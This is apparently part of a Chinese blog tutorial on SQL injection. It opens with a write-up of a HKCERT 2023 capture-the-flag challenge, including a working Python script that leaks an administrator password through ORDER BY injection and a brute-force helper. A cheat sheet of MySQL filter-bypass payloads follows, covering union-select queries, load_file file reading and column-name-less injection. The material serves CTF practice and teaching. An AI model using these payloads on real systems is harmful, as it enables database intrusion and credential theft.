<p>有注入点的代码</p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs n1ql">cursor.execute(f&quot;<span class="hljs-keyword">SELECT</span> username, publicnote <span class="hljs-keyword">FROM</span> users <span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> &#123;column&#125; &#123;ascending&#125;;&quot;)<br></code></pre></td></tr></table></figure>
<p>这里用<code>&#123;column&#125;</code>而不是<code>(%s),(column)</code>,所以存在sql注入</p>
<p>题目大概是拿到Administrator的密码(16为十进制数)然后登录获取flag</p>
<p>利用<code>order by</code>的排序规则，每次注册一个用户，然后按照密码某一位排序，通过相对位置可以推算出密码，小坑就是相同字母排序好像是随机的，所以最终会导致推算不准，需要进一步爆破</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> json<br><br>url = <span class="hljs-string">&#x27;http://chal-a.hkcert23.pwnable.hk:28107/&#x27;</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">signup</span>(<span class="hljs-params">username, password</span>):<br>    header = &#123;<span class="hljs-string">&quot;Content-Type&quot;</span>: <span class="hljs-string">&quot;application/json&quot;</span>&#125;<br>    cookie = &#123;<span class="hljs-string">&quot;PHPSESSID&quot;</span>: <span class="hljs-string">&quot;1e45ea4eb9daa404b6e75847ca9e2558&quot;</span>&#125;<br>    data = &#123;<span class="hljs-string">&quot;username&quot;</span>: username, <span class="hljs-string">&quot;password&quot;</span>: password&#125;<br>    data = json.dumps(data)<br>    r = requests.post(url=url + <span class="hljs-string">&#x27;signup&#x27;</span>, cookies=cookie, headers=header, data=data)<br>    <span class="hljs-comment"># print(r.text)</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">note</span>(<span class="hljs-params">token, i, username1, username2</span>):<br>    payload = <span class="hljs-string">f&#x27;?noteType=public&amp;column=right(left(password,<span class="hljs-subst">&#123;i&#125;</span>),1)&amp;ascending=ASC&#x27;</span><br>    cookie = &#123;<span class="hljs-string">&quot;PHPSESSID&quot;</span>: <span class="hljs-string">&quot;1e45ea4eb9daa404b6e75847ca9e2558&quot;</span>, <span class="hljs-string">&quot;token&quot;</span>: token&#125;<br>    r = requests.get(url=url + <span class="hljs-string">&#x27;/note&#x27;</span> + payload, cookies=cookie)<br>    <span class="hljs-comment"># print(r.text)</span><br>    JSON = json.loads(r.text)<br>    <span class="hljs-comment"># print(JSON)</span><br>    <span class="hljs-keyword">for</span> j, item <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(JSON[<span class="hljs-string">&#x27;content&#x27;</span>]):<br>        <span class="hljs-keyword">if</span> item[<span class="hljs-string">&#x27;username&#x27;</span>] == <span class="hljs-string">&#x27;Administrator&#x27;</span>:<br>            index_admin = j<br>        <span class="hljs-keyword">elif</span> item[<span class="hljs-string">&#x27;username&#x27;</span>] == username1:<br>            index_username1 = j<br>        <span class="hljs-keyword">elif</span> item[<span class="hljs-string">&#x27;username&#x27;</span>] == username2:<br>            index_username2 = j<br><br>    <span class="hljs-keyword">if</span> index_username1 &lt; index_admin <span class="hljs-keyword">and</span> index_admin &lt; index_username2:<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;yes&quot;</span><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;no&quot;</span><br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    p = <span class="hljs-string">&#x27;&#x27;</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">17</span>, <span class="hljs-number">1</span>):<br>        <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">47</span>, <span class="hljs-number">57</span>, <span class="hljs-number">1</span>):<br><br>            username1 = <span class="hljs-string">f&#x27;bccdd<span class="hljs-subst">&#123;i&#125;</span>&#x27;</span> + <span class="hljs-built_in">chr</span>(j)<br>            password1 = <span class="hljs-string">&#x27;0&#x27;</span> * (i - <span class="hljs-number">1</span>) + <span class="hljs-built_in">chr</span>(j) + <span class="hljs-string">&#x27;0&#x27;</span> * (<span class="hljs-number">16</span> - i)<br>            signup(username1, password1)<br>            token1 = base64.b64encode(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;username1&#125;</span>:<span class="hljs-subst">&#123;password1&#125;</span>&quot;</span>.encode()).decode()<br>            <span class="hljs-keyword">if</span> (j == <span class="hljs-number">56</span>):<br>                username2 = <span class="hljs-string">f&#x27;bbccd<span class="hljs-subst">&#123;i&#125;</span>&#x27;</span> + <span class="hljs-built_in">chr</span>(j + <span class="hljs-number">3</span>)<br>                password2 = <span class="hljs-string">&#x27;0&#x27;</span> * (i - <span class="hljs-number">1</span>) + <span class="hljs-built_in">chr</span>(j + <span class="hljs-number">3</span>) + <span class="hljs-string">&#x27;0&#x27;</span> * (<span class="hljs-number">16</span> - i)<br>            <span class="hljs-keyword">else</span>:<br>                username2 = <span class="hljs-string">f&#x27;bbccd<span class="hljs-subst">&#123;i&#125;</span>&#x27;</span> + <span class="hljs-built_in">chr</span>(j + <span class="hljs-number">2</span>)<br>                password2 = <span class="hljs-string">&#x27;0&#x27;</span> * (i - <span class="hljs-number">1</span>) + <span class="hljs-built_in">chr</span>(j + <span class="hljs-number">2</span>) + <span class="hljs-string">&#x27;0&#x27;</span> * (<span class="hljs-number">16</span> - i)<br>            signup(username2, password2)<br>            token2 = base64.b64encode(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;username2&#125;</span>:<span class="hljs-subst">&#123;password2&#125;</span>&quot;</span>.encode()).decode()<br>            flag = note(token2, i, username1, username2)<br>            <span class="hljs-keyword">if</span> (flag == <span class="hljs-string">&quot;yes&quot;</span>):<br>                p += <span class="hljs-built_in">chr</span>(j+<span class="hljs-number">1</span>)<br>                <span class="hljs-built_in">print</span>(p)<br>                <span class="hljs-keyword">break</span><br><span class="hljs-comment"># 8336883846371110</span><br></code></pre></td></tr></table></figure>
<p>缩小爆破范围</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br>one = <span class="hljs-string">&#x27;89&#x27;</span><br>two = <span class="hljs-string">&#x27;34&#x27;</span><br>three = <span class="hljs-string">&#x27;34&#x27;</span><br>four = <span class="hljs-string">&#x27;67&#x27;</span><br>five = <span class="hljs-string">&#x27;89&#x27;</span><br>six = <span class="hljs-string">&#x27;89&#x27;</span><br>senve = <span class="hljs-string">&#x27;34&#x27;</span><br>eight = <span class="hljs-string">&#x27;89&#x27;</span><br>nine = <span class="hljs-string">&#x27;45&#x27;</span><br>ten = <span class="hljs-string">&#x27;67&#x27;</span><br>eleven = <span class="hljs-string">&#x27;34&#x27;</span><br>twe = <span class="hljs-string">&#x27;78&#x27;</span><br>thir = <span class="hljs-string">&#x27;12&#x27;</span><br>fort = <span class="hljs-string">&#x27;12&#x27;</span><br>fif = <span class="hljs-string">&#x27;12&#x27;</span><br>sist = <span class="hljs-string">&#x27;01&#x27;</span><br><br><br><span class="hljs-keyword">for</span> a <span class="hljs-keyword">in</span> one:<br>    <span class="hljs-keyword">for</span> b <span class="hljs-keyword">in</span> two:<br>        <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> three:<br>            <span class="hljs-keyword">for</span> d <span class="hljs-keyword">in</span> four:<br>                <span class="hljs-keyword">for</span> e <span class="hljs-keyword">in</span> five:<br>                    <span class="hljs-keyword">for</span> f <span class="hljs-keyword">in</span> six:<br>                        <span class="hljs-keyword">for</span> g <span class="hljs-keyword">in</span> senve:<br>                            <span class="hljs-keyword">for</span> h <span class="hljs-keyword">in</span> eight:<br>                                <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> nine:<br>                                    <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> ten:<br>                                        <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> eleven:<br>                                            <span class="hljs-keyword">for</span> l <span class="hljs-keyword">in</span> twe:<br>                                                <span class="hljs-keyword">for</span> m <span class="hljs-keyword">in</span> thir:<br>                                                    <span class="hljs-keyword">for</span> n <span class="hljs-keyword">in</span> fort:<br>                                                        <span class="hljs-keyword">for</span> o <span class="hljs-keyword">in</span> fif:<br>                                                            <span class="hljs-keyword">for</span> p <span class="hljs-keyword">in</span> sist:<br>                                                                payload = a + b + c + d + e + f + g + h + i + j + k + l + m + n + o + p<br>                                                                username = <span class="hljs-string">&quot;Administrator&quot;</span><br>                                                                password = payload<br>                                                                header = &#123;<span class="hljs-string">&quot;Content-Type&quot;</span>: <span class="hljs-string">&quot;application/json&quot;</span>&#125;<br>                                                                token = base64.b64encode(<br>                                                                    <span class="hljs-string">f&quot;<span class="hljs-subst">&#123;username&#125;</span>:<span class="hljs-subst">&#123;password&#125;</span>&quot;</span>.encode()).decode()<br>                                                                fi = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;password.txt&quot;</span>, <span class="hljs-string">&quot;a&quot;</span>)<br>                                                                fi.write(password+<span class="hljs-string">&#x27;\n&#x27;</span>)<br>                                                                fi.close()<br>                                                                fi = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;token.txt&quot;</span>, <span class="hljs-string">&quot;a&quot;</span>)<br>                                                                fi.write(token+<span class="hljs-string">&#x27;\n&#x27;</span>)<br>                                                                fi.close()<br><span class="hljs-comment">#8446993857382221</span><br></code></pre></td></tr></table></figure>
<h2 id="进阶"><a class="markdownIt-Anchor" href="#进阶"></a> 进阶</h2>
<p>应对各种过滤技巧</p>
<h3 id="过滤空格"><a class="markdownIt-Anchor" href="#过滤空格"></a> 过滤空格</h3>
<h4 id="注释符绕过"><a class="markdownIt-Anchor" href="#注释符绕过"></a> 注释符/**/绕过</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">SELECT/**/name/**/FROM/**/table<br></code></pre></td></tr></table></figure>
<h4 id="用tab代替空格"><a class="markdownIt-Anchor" href="#用tab代替空格"></a> 用Tab代替空格</h4>
<h4 id="20绕过"><a class="markdownIt-Anchor" href="#20绕过"></a> %20绕过</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">SELECT%20name%20FROM%20table<br></code></pre></td></tr></table></figure>
<h4 id="使用url编码绕过"><a class="markdownIt-Anchor" href="#使用url编码绕过"></a> 使用<strong>url编码</strong>绕过</h4>
<figure class="highlight haml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs haml"><span class="hljs-tag">%<span class="hljs-selector-tag">a0</span></span> 发出去就是空格的意思，但是需要在burp中抓包后修改<br></code></pre></td></tr></table></figure>
<h4 id="使用回车替代"><a class="markdownIt-Anchor" href="#使用回车替代"></a> 使用回车替代</h4>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gcode">回车的ascii为chr<span class="hljs-comment">(13)</span>&amp;chr<span class="hljs-comment">(10)</span>，url编码为<span class="hljs-meta">%</span><span class="hljs-number">0</span>d<span class="hljs-meta">%</span><span class="hljs-number">0</span>a<br></code></pre></td></tr></table></figure>
<h4 id="双空格"><a class="markdownIt-Anchor" href="#双空格"></a> 双空格</h4>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">适用于过滤是替换一个空格<br></code></pre></td></tr></table></figure>
<h4 id="用括号绕过"><a class="markdownIt-Anchor" href="#用括号绕过"></a> 用括号绕过</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">select(user())from dual where(1=1)and(2=2)<br></code></pre></td></tr></table></figure>
<h3 id="过滤引号"><a class="markdownIt-Anchor" href="#过滤引号"></a> 过滤引号</h3>
<h4 id="27代替引号"><a class="markdownIt-Anchor" href="#27代替引号"></a> %27代替引号</h4>
<h4 id="十六进制绕过"><a class="markdownIt-Anchor" href="#十六进制绕过"></a> 十六进制绕过</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">原语句：select column_name  from information_schema.tables where table_name=0x7573657273   //hex(users)   只能对参数使用<br></code></pre></td></tr></table></figure>
<h4 id="ascii码绕过"><a class="markdownIt-Anchor" href="#ascii码绕过"></a> ASCII码绕过</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)<br></code></pre></td></tr></table></figure>
<h3 id="过滤等于号"><a class="markdownIt-Anchor" href="#过滤等于号"></a> 过滤等于号</h3>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus">用 like 代替 ：a=<span class="hljs-selector-tag">b</span>  ---&gt;&gt;&gt; <span class="hljs-selector-tag">a</span> like <span class="hljs-selector-tag">b</span><br>regexp 代替等于号	<span class="hljs-selector-tag">a</span> regexp <span class="hljs-selector-tag">b</span> ，regexp是正则<br></code></pre></td></tr></table></figure>
<h3 id="过滤逗号"><a class="markdownIt-Anchor" href="#过滤逗号"></a> <strong>过滤逗号</strong></h3>
<h4 id="使用from关键字绕过"><a class="markdownIt-Anchor" href="#使用from关键字绕过"></a> 使用from关键字绕过</h4>
<p>对于<code>substr()</code>和<code>mid()</code>这两个方法可以使用<code>from to</code>的方式来解决</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs mysql">select substr(database() from 1 for 1);<br>select mid(database() from 1 for 1);<br></code></pre></td></tr></table></figure>
<h4 id="使用join关键字绕过"><a class="markdownIt-Anchor" href="#使用join关键字绕过"></a> 使用<strong>join关键字</strong>绕过</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs mysql">union select 1,2<br>等价于<br>union select * from (select 1)a join (select 2)b<br></code></pre></td></tr></table></figure>
<h4 id="使用offset关键字绕过"><a class="markdownIt-Anchor" href="#使用offset关键字绕过"></a> 使用<strong>offset关键字</strong>绕过</h4>
<p>对于limit可以使用offset来绕过：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs mysql">select * from news limit 0,1<br>等价于<br>select * from news limit 1 offset 0<br></code></pre></td></tr></table></figure>
<h3 id="过滤注释符和"><a class="markdownIt-Anchor" href="#过滤注释符和"></a> 过滤注释符(#和–+)</h3>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">1</span>）最后的or &#x27;<span class="hljs-number">1</span>闭合查询语句的最后的单引号：id=<span class="hljs-number">1</span>&#x27; union select <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>||&#x27;<span class="hljs-number">1</span><br><span class="hljs-attribute">2</span>）%<span class="hljs-number">23</span>绕过<br><span class="hljs-attribute">3</span>）;%<span class="hljs-number">00</span>绕过<br></code></pre></td></tr></table></figure>
<h3 id="过滤关键字"><a class="markdownIt-Anchor" href="#过滤关键字"></a> 过滤关键字</h3>
<h4 id="分割关键字"><a class="markdownIt-Anchor" href="#分割关键字"></a> 分割关键字</h4>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">用<span class="hljs-regexp">/**/</span>，&lt;&gt; 分割：sel&lt;&gt;ect、sel<span class="hljs-regexp">/**/</span>ect<br></code></pre></td></tr></table></figure>
<h4 id="使用加号拆解字符串"><a class="markdownIt-Anchor" href="#使用加号拆解字符串"></a> 使用<strong>加号+拆解字符串</strong></h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">or ‘swords’ =‘sw’ +’ ords’ ；EXEC(‘IN’ +’ SERT INTO ‘+’ …..’ )<br></code></pre></td></tr></table></figure>
<h4 id="大小写绕过"><a class="markdownIt-Anchor" href="#大小写绕过"></a> 大小写绕过</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">id=-1&#x27;UnIoN/**/SeLeCT<br></code></pre></td></tr></table></figure>
<h4 id="双写绕过"><a class="markdownIt-Anchor" href="#双写绕过"></a> 双写绕过</h4>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">适用于剥离关键字的<br></code></pre></td></tr></table></figure>
<h4 id="编码绕过"><a class="markdownIt-Anchor" href="#编码绕过"></a> 编码绕过</h4>
<figure class="highlight cos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cos"><span class="hljs-number">16</span>进制编码，url编码，<span class="hljs-keyword">ascii</span>编码(都只对参数有效)<br></code></pre></td></tr></table></figure>
<h3 id="过滤连接关键字"><a class="markdownIt-Anchor" href="#过滤连接关键字"></a> 过滤连接关键字</h3>
<h4 id="过滤concat"><a class="markdownIt-Anchor" href="#过滤concat"></a> 过滤concat()</h4>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">使用make_<span class="hljs-keyword">set</span>（）代替<br></code></pre></td></tr></table></figure>
<img src="/2023/01/31/SQL%E6%B3%A8%E5%85%A5/2.jpg" srcset="/img/loading.gif" lazyload class="">
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46079186/article/details/120991059">make_set()用法</a></p>
<p><code>make_set(bits,str1,str2,…)</code>会将bits(十进制)转为二进制然后取二进制反码，然后从左到右每一位对应一个字符，如果该位为1，则输出该位对应的字符</p>
<h3 id="文件读取"><a class="markdownIt-Anchor" href="#文件读取"></a> 文件读取</h3>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs gams">show <span class="hljs-keyword">variables</span> like <span class="hljs-comment">&quot;%secure_file%&quot;</span>;<br>当值为空时，mysql可以读取任何文件<br>当值为某一路径时，只有改路径下的文件能够被mysql读取<br></code></pre></td></tr></table></figure>
<p><code>load_file(path)</code>（需要root权限）可以用user()查看权限</p>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-number">0</span>&#x27; <span class="hljs-built_in">union</span> <span class="hljs-built_in">select</span> <span class="hljs-built_in">user</span>()<span class="hljs-meta">#</span><br><span class="hljs-number">0</span>&#x27; <span class="hljs-built_in">union</span> <span class="hljs-built_in">select</span> <span class="hljs-built_in">load_file</span>()<span class="hljs-meta">#</span><br></code></pre></td></tr></table></figure>
<h3 id="无列名注入"><a class="markdownIt-Anchor" href="#无列名注入"></a> 无列名注入</h3>
<p>通常获取列名是通过<code>information_schema</code>，但有时会被过滤</p>
<p>可以先查表名</p>
<p>1.InnoDb引擎</p>
<p>MYSQL5.5.8之后，InnoDB成为其默认存储引擎。</p>
<p>MYSQL5.6以上版本，增加了innodb_index_stats和innodb_table_stats两张表，可以获取数据库和表名，但无列名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs mysql">union select group_concat(table_name)from mysql.innodb_index_stats where database_name=database()<br>union select group_concat(table_name)from mysql.innodb_table_stats where database_name=database()<br></code></pre></td></tr></table></figure>
<p>2.sys数据库</p>
<p>5.7以上的MYSQL，新增了sys数据库，可以通过schema_auto_increment_columns获取表名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs mysql">select table_name from sys.schema_table_statistics_with_buffer where table_schema = database()<br>select table_name from sys.schema_auto_increment_columns where table_schema =&#x27;ctf&#x27;<br></code></pre></td></tr></table></figure>
<p>原理：通过联合查询构造虚拟表将数据外带，通过自定义列名，再从虚拟表中查询</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">select `2` from (select 1,2,3 union select * from test)n<br></code></pre></td></tr></table></figure>
<h3 id="参考资料"><a class="markdownIt-Anchor" href="#参考资料"></a> <em>参考资料</em></h3>
<p><em><a target="_blank" rel="noopener" href="https://ctf-wiki.org/web/sqli/">https://ctf-wiki.org/web/sqli/</a></em></p>
<p><em><a target="_blank" rel="noopener" href="https://zu1k.com/posts/security/web-security/bypass-tech-for-sql-injection-keyword-filtering/">https://zu1k.com/posts/security/web-security/bypass-tech-for-sql-injection-keyword-filtering/</a></em></p>
<p><a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md#using-conditional-statements">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MySQL Injection.md#using-conditional-statements</a></p>

                
              </div>
            
            <hr/>
            <div>
              <p class="note note-warning">
                <strong>本文作者: </strong><a href="/">fru1ts</a> <br>
                <strong>本文链接: </strong><a href="https://fru1ts.github.io/2023/01/31/SQL%E6%B3%A8%E5%85%A5/">https://fru1ts.github.io/2023/01/31/SQL%E6%B3%A8%E5%85%A5/</a> <br>
                <strong>版权声明: </strong>本站均采用BY-SA协议，除特别声明外，转载请注明出处!
                   </p>
                   

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/02/11/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="php反序列化">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">php反序列化</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/01/25/XSS/" title="XSS">
                        <span class="hidden-mobile">XSS</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"WEdmoCOkNdSUMsONpu72ngCo-gzGzoHsz","appKey":"PSBkctB8cKrR97yZLNXnJ0nj","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  








    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> </div> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        Total number of visits 
        <span id="leancloud-site-pv"></span>
         
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        Total number of visitors 
        <span id="leancloud-site-uv"></span>
         
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
